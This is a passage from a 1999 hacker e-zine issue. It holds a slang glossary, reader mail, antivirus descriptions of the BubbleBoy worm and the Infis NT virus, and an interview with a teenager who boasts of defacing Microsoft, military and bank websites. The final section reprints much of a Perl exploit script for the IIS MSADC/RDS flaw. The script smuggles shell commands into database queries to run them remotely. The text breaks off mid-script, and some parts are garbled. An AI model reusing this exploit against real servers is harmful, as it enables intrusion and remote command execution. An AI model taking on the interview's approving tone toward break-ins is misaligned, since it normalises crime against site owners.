~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ YTcracker Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== Our newsletter gets mirrored and indexed by new underground search engine Nethersearch.com From: signalGod To: hwa@press.usmc.net Sent: Thursday, November 18, 1999 10:00 AM Subject: NetherSearch.Com HWA, I am one of the webmasters of NetherSearch.Com. We subscribed to your newsletter and have decided to download all of your newsletters to our server to act as a mirror for your files. Please feel free to visit our site and check it out, and please let us know what your think. Your newsletters have been added to our database, and is searchable with our database search engine. We would also like to invite you to submit your website to our internet search database. This will help us both by driving some traffic to your site and adding depth to our database. Thanks, ______________________________________________________ SignalGod NetherSearch.Com - http://www.nethersearch.com - - Underground and Hacking Database Search Engine - Submit a URL to NetherSearch.Com - http://www.nethersearch.com/search/addurl.htm - -=- From: Drew aka. Wyzewun To: Sent: Friday, November 19, 1999 1:36 PM Subject: el8 phan mail!@#$% *Ahem* Dear HWA.hax0r.news, Since I have never seen anything in your mailbag, I figured I would write to you and give you something to put there. First off, let me dispell the rumour that Cruciphux has sex with sheep. Second of all, let me dispell the rumour that there never *was* a rumour that Cruciphux has sex with sheep. And in conclusion, I would like to say that I personally enjoy having sex with sheep. Your zine is the best in the whole wide world, except for that Forbidden Knowledge zine, which is even more kickass. Now who does that again... fux0r, I can't remember. But this is under no circumstances because I am drunk. Or because Pneuma has mad cheap wine here. It is just because I simply DON'T KNOW, okay?!@#$ Please respond to me as soon as possible and give me a URL for good 1nph0z3 on insecurities in Vortexia's anal cavity - they told me to look for RFC31337, but I can't find it anywhere! Please help... That Neato Elito Skanky Ass Hoe, Wyzewun [w1@antioffline.com] _______________________________________________________________ http://www.webmail.co.za the South-African free email service -=- From: Kernel Panic To: HWA.hax0r.news Sent: Tuesday, November 16, 1999 5:08 AM Subject: RE: Issue #41 for Nov 7th out today ================================================================== The following message was received at HWA.hax0r.news-owner@listbot.com and is being forwarded to you, the list owner. ================================================================== I just want to say "Thank U for the great job of resuming the events and news of security bussiness" Keep up with the excellent job Kernel Panic SouthAmerica-Peru ______________________________________________________________________ To unsubscribe, write to HWA.hax0r.news-unsubscribe@listbot.com Start Your Own FREE Email List at http://www.listbot.com/ From: To: Sent: Friday, November 19, 1999 9:06 PM Subject: xxhax0rxx claims responsiblity for hacking & destroying website Do you know this xxhax0rxx person? He has claimed responsibility for hacking & destroying a school webpage....he also posted in its place a full page of written garbage about our school. Please tell me that he is not affiliated with your group. I can send all correspondence from him to you if you would like. But he claims that he is Hax0r and goes by the screen name of xxhax0rxx. -=- Seems that because we have 'hax0r' in our name that we're target for all kinds of lamers that use an alias or connotation of 'hax0r', notice the 'screenname' good old aol... - Ed See? we really do get mail Wyze1 ;-) I just don't print it all, ok sometimes I forget, sometimes its lame ... but kudos are always welcomed... - Ed 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * We're a week behind schedule with this release again, * seems like i'm not doing well in cold season. Being ill * sucks and doesn't lend itself towards working on the * newsletter. Anyway here it is, have fun.. check out all * the new website defacements by sSh (Sesame Street Hackers) * they've been busy ppl... * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start =- ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| _ _ ___| |_ __ _ _ __| |_ / __| __/ _` | '__| __| \__ \ || (_| | | | |_ |___/\__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= start =- 03.0 Bubbleboy email worm description ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.avp.ch I-Worm.BubbleBoy Type: Email Worm Platform: MS Windows with Internet Explorer 5.0, MS Outlook 98/2000 or MS Outlook Express This is a worm virus spreading via Internet as infected email messages. The worm arrives as a message with no attachments - the worm uses several tricks to activate its code directly from the message body. When this message is opened, the worm code takes control, gets access to system resources (disk files and system registry), processes Outlook address book and sends infected messages to these addresses (in a similar way the Macro.Word97.Melissa"virus does). This is the first known modern Internet worm that spreads its copies with no attached data. In case of other Internet worms a user should open the attach to activate the worm routines. In case of this worm its spreading routines take control at the moment the message itself is opened. The Tricks To spread its copies this worm uses two tricks. The first one is the feature of MS Outlook that allows creating messages in the HTML format. HTML messages may contain scripts that will be automatically executed at the moment the HTML message is being displayed (user opens the message). The worm uses this feature to run its code when the infected message is opened. To spread its copies further and to bypass Internet Explorer security the worm uses another trick, the so-called "Scriptlet.Typelib" security vulnerability. This security breach allows HTML scripts to create disk files. The worm uses this breach to create a HTA-file (HTML Applications, new type appeared with IE5) which contains the main worm code. This file is created in the Startup Windows folder, and as a result it is activated on next Windows startup. Being run as a local disk file the worm script in this HTML gets access to disk files and resources with no Internet Explorer security warning messages, connects Outlook address book and spreads itself. Technical details When a user opens infected message the worm script embedded into this message body is automatically activated and executed by MS Outlook. This script (by using security breach) creates the "UPDATE.HTA" file in the "C:\WINDOWS\START MENU\PROGRAMS\STARTUP" directory. The same file the worm tries to create in the "C:\WINDOWS\MENU INICIO\PROGRAMAS\INICIO\" directory (Spain Windows default name). This "UPDATE.HTA" file contains the main worm code. It will be executed on next Windows startup because of its location in the Startup folder. The worm has a minor bug here: it supposes that Windows is always installed in the C:\WINDOWS directory, in other case the worm cannot create its file and fails to replicate further. When the UPDATE.HTA file is executed, the worm runs Outlook application in hidden window and creates a new message to all recipients from Outlook address book in the same way as "Melissa" virus does. This new message has the HTML format and contains worms script in the body. Message subject is "BubbleBoy back!", and text body is looks like follows: The BubbleBoy incident, pictures and sounds http://www.towns.com/dorms/tom/bblboy.htm (Note: the above shown web-address doesn't work) After this message is being sent, to prevent duplicate messages sending the worm creates in system registry key: "HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy\" = "OUTLOOK.BubbleBoy 1.0 by Zulu" At the end the worm leaves on the screen the window with the text inside: System error, delete "UPDATE.HTA" from the startup folder to solve this problem. The worm also changes the Windows registration data (this routine is executed at the moment the UPDATE.HTA script takes control): RegisteredOwner = "BubbleBoy" RegisteredOrganization = "Vandelay Industries" Protection Microsoft has released an update that eliminates this security vulnerability. We strongly recommend you visit http://support.microsoft.com/support/kb/articles/Q240/3/08.ASP and install this update. If you do not use any HTML applications (HTA-files) at your work, there is another way to prevent infection by viruses of this type (the worms and viruses that use "Scriptlet.Typelib" security vulnerability). It requires to remove the file association for .HTA extension. To do this you have to follow several steps: 1.Double click the MyComputer icon on desktop. 2.In the appearing window choose menu the "View" -> "Options...". 3.On "File Types" tab in "Registered file types" listbox select "HTML Applicaton" item. 4.Click "Remove" button and confirm action. 5.Close options dialog box. @HWA 04.0 WinNT.Infis.4608 new Win NT virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.avp.ch/ WinNT.Infis.4608 "Infis" is a memory resident virus operating under Windows NT 4.0 with Service Packs 2, 3, 4, 5, 6 installed. It does not affect systems running Windows 95/98, Windows 2000 or other versions of Windows NT. Indication of an infection The virus does not manifest itself in any way and does not do any harm to the system. Despite this the virus has a bug in its infection routine and corrupts some files while infecting them, the corrupted files when run cause the standard "is not a valid Windows NT application" error message. Another indicator of virus presence is the INF.SYS file in the /WinNT/System32/Drivers folder. Installation The virus installation routine copies the virus to the system, registers itself in there and returns control to the host program. As a result on first start the virus just installs its "dropper" to the system and does not infect the WinNT memory and other files. The memory and file infection routines will be activated later, when the "dropper" is run. To install its "dropper" the virus extracts its "pure" code (4608 bytes) as a standalone PE EXE file with the INF.SYS name and writes it to the \SystemRoot\system32\drivers directory. Next the virus adds "run-it" commands to the system registry, to do that the virus creates new Registry key with three sections:: \Registry\Machine\System\CurrentControlSet\Services\inf Type = 1 - standard Windows NT driver Start = 2 - driver start mode ErrorControl = 1 - continue system loading on error in driver As a result the virus dropper is loaded as system WinNT driver on next system restart. When the INF.SYS virus dropper takes control the virus allocates a block of WinNT memory, reads its complete copy from the INF.SYS file for further use in infection routine and hooks a poorly documented WinNT internal system functions handler. The virus hooker intercepts file opening function only, checks the file name and extension, then opens the file, checks file format (PE) and runs the infection routine. Infection The "Infis" virus infects only PE (Portable Executable) EXE-files except CMD.EXE (Windows NT command processor). To separate infected and not infected files the virus sets file time and date double word stamp in the PE header to -1 (FFFFFFFFh). While infecting a file the virus increases the size of last file section, writes itself to there and modifies necessary fields in the file header. As a result when infected PE files are executed, the virus code receives control and runs the installation routine. Payload The "Infis" virus does not carry any destructive payload. However, it contains errors that corrupt some files when infecting them. When the corrupted file is run it invokes a standard Windows NT application error message. 05.0 OSALL Interview with Flipz 1st person to deface a Microsoft site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interview With Flipz 10/27/99 Mike Hudack Editor-in-Chief Flipz is a young man who both goes to school and moonlights as a systems analyst somewhere. Heīs got a bright future for someone only fifteen years old [Editorīs NOTE: As the writer of this article, I must admit that I am but sixteen years old.]... And, at that young age, he has been covered in MSNBC, Ziff Davis, Slashdot and so many more. At that young age heīs made history as the first person to deface a Microsoft Web page -- ever. "I do it for fun, just like everyone does it for fun," Flipz said in an effect to explain why he defaces sites, "we donīt do it because we have to, we donīt do it because we want to, we donīt do it because itīs fun." He says that his first defacement was when he was around ten or eleven -- that time a Solaris machine. He cnows that he hacs but doesnīt now that heīs defaced servers? Andersen Air Force Base "Hold on five seconds, Iīll tell you," he told me when I asked if anything else was happening soon. After a couple affirmatives and a few obscenities he informed me that heīd just gotten his latest defacement. "Andersen.af.mil," he calmly told me. It was just the latest in a string of sites he had previously held root on. Apparently something has happened in Flipzī life to make him want to just throw it all out. "Itīs been tough," he said. "I just wanted to have some fun," let out some pent-up aggression. Microsoft Now it seems that he targets Microsoft NT boxes exclusively, explaining that he hates Windows NT -- and that Windows 2000 pisses him off even more. The thing that Flipz is most famous for right now is defacing the first Microsoft site ever. He was on the phone with someone when he defaced it... When he heard it was the first he was excited, but not suprised. "I kind of knew it, but I didnīt know it," he says about the defacement. High Profile Like the Microsoft defacement, all of Flipzī attacks have been attention garnering, although none so much as that. Heīs attacked numerous military sites, including from the Navy and Army. In addition heīs defaced two Department of Energy Web sites and the Duracell Battery Company, among others. Law Enforcement It was a couple months ago when Flipz defaced Peopleīs Bank, a relatively small Connecticut bank. Somewhat aftewards Attrition.org was subpeonaed for any records they may have pertaining to Flipz and the defacement. When I told him about the subpeona Flipz was rather shocked that the FBI hadnīt raided him yet. "Itīs been a while... youīd think they would have at least stopped me after White Sands [Missile Base.]" The FBI didnīt though. At one point during our conversation Flipz thought he was being raided as a black van rounded the corner to his house. It turned out to be nothing, however. "Iīm just sitting on edge, waiting for them to raid me," he said. He explained that he hadnīt done much to cover his tracks because theyīd find him anyway. "Why bother with twenty hops when theyīll just issue twenty subpeonas?" And, he added, "even if I cover my tracks well... all they need is one person on IRC to say `oh, I know who this person is.ī" The FBI, at this point, doesnīt seem to know Flipzī identity. They asked me several times in a later interview, and each time came up empty because I didnīt know myself. More is available on the FBI. Skills Some people on IRC have questioned Flipzī skills. Flipz says that he "works with NT on a daily basis [as a] systems analyst" but others arenīt too sure. "Heīs demonstrated no real NT skills," said one IRCer who knew flipz but wished to remain anonymous. This IRCer said that all the defacements were on NT systems running IIS, insinuating that Flipz was simply using the eEye exploit released earlier this year. But Flipz mantains that "Iīm not using IIS, Iīm not using FrontPage, Iīm not using FTP exploits..." Rather, he says heīs using "some exploits modified for my own use and a private one or two." More detail on his methodology, or speculation thereof, is available. Related links: http://www.aviary-mag.com/News/FBI/fbi.html http://www.aviary-mag.com/News/Old_News/IIS___eEye/iis___eeye.html http://www.aviary-mag.com/News/The_Exploit/the_exploit.html Flipz' Exploit? (Previously released) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ######################################################################## #!/usr/bin/perl # # MSADC/RDS 'usage' (aka exploit) script version 2 # # by rain forest puppy # # - added UNC support, really didn't clean up code, but oh well use Socket; use Getopt::Std; getopts("e:vd:h:XRVNwcu:s:", \%args); print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\\\\host\\share\\file> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s = run only step Or a -R will resume a (v2) command session ~; exit;} ########################################################### # config data @drives=("c","d","e","f","g","h"); @sysdirs=("winnt","winnt35","winnt351","win","windows"); # we want 'wicca' first, because if step 2 made the DSN, it's ready to go @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); # this is sparse, because I don't know of many @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\ias\\ias.mdb", "\\system32\\ias\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ ########################################################### $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (!defined $args{R}){ $ret = &has_msadc; } if (defined $args{X}) { &hork_idx; exit; } if (defined $args{N}) { &get_name; exit; } if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} if (defined $args{R}) { &load; exit; } print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; if (!defined $args{s} || $args{s}==1){ print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr;} if (!defined $args{s} || $args{s}==2){ print "\nStep 2: Trying to make our own DSN..."; if (&make_dsn){ print "<>\n"; sleep(3); } else { print "<>\n"; }} # we need to sleep to let the server catchup if (!defined $args{s} || $args{s}==3){ print "\nStep 3: Trying known DSNs..."; &known_dsn;} #crippled if (!defined $args{s} || $args{s}==5){ if (defined $args{u}){ print "\xStep 5: Trying UNC..."; &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} if (!defined $args{s} || $args{s}==6){ if (defined $args{e}){ print "\nStep 6: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; exit; ############################################################################## sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT "." if(defined $args{X});} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $aa, $bb; if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; } else { $aa="AdvancedDataFactory.Query"; $bb="3";} #crippled ADCClientVersion:01.06 Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb --!ADM!ROX!YOUR!WORLD! Content-Type: application/x-varg Content-Length: $reqlen EOT ; $msadc=~s/\n/\r\n/g; return $msadc;} ############################################################################## sub make_req { # make the RDS request my ($switch, $p1, $p2)=@_; my $req=""; my $t1, $t2, $query, $dsn; if ($switch==1){ # this is the btcustmr.mdb query $query="Select * from Customers where City='|shell(\"$command\")|'"; $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} elsif ($switch==2){ # this is general make table query $query="create table AZZ (B int, C varchar(10))"; $dsn="$p1";} elsif ($switch==3){ # this is general exploit table query $query="select * from AZZ where C='|shell(\"$command\")|'"; $dsn="$p1";} elsif ($switch==4){ # attempt to hork file info from index server $query="select path from scope()"; $dsn="Provider=MSIDXS;";} elsif ($switch==5){ # bad query $query="select"; $dsn="$p1";} elsif ($switch==6){ # this is table-independant query (new) $query="select * from MSysModules where name='|shell(\"$command\")|'"; $dsn="$p1";} $t1= make_unicode($query); $t2= make_unicode($dsn); if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; } $req.= "\x08\x00" . pack ("S1", length($t1)); $req.= "\x00\x00" . $t1 ; $req.= "\x08\x00" . pack ("S1", length($t2)); $req.= "\x00\x00" . $t2 ; $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n"; return $req;} ############################################################################## sub make_unicode { # quick little function to convert to unicode my ($in)=@_; my $out; for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; } return $out;} ############################################################################## sub rdo_success { # checks for RDO return success (this is kludge) my (@in) = @_; my $base=content_start(@in); if($in[$base]=~/multipart\/mixed/){ return 1 if( $in[$base+10]=~/^\x09\x00/ );} return 0;} ############################################################################## sub make_dsn { # this (tries to) make a DSN for us print "\nMaking DSN: "; foreach $drive (@drives) { print "$drive: "; my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" . "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=" . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n"); $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#; return 0 if $2 eq "404"; # not found/doesn't exist if($2 eq "200") { foreach $line (@results) { return 1 if $line=~/

Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { foreach $dir (@sysdirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n"; save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1)=@_; my $ropt=""; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; if (defined $args{c}){ $ropt="c ";} if (defined $args{V}){ $ropt.="V ";} if (defined $args{w}){ $ropt.="w ";} print OUT "v2\n$ip\n$ropt\n$p1\n"; close OUT;} ############################################################################## sub load { my ($action)=@_; my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; open(IN,"; close(IN); die("Wrong rds.save version") if $p[0] ne "v2\n"; $ip="$p[1]"; $ip=~s/\n//g; $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; @switches=split(/ /,$p[2]); foreach $switch (@switches) { $args{$switch}="1";} if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; $torun="$p[3]"; $torun=~s/\n//g; if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work if($torun=~/^dbq/){ $torun=$drvst.$torun; } if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; } exit;} ############################################################################## sub create_table { return 1 if (!defined $args{c}); return 1 if (defined $args{V}); my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (!defined $args{c}); return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + 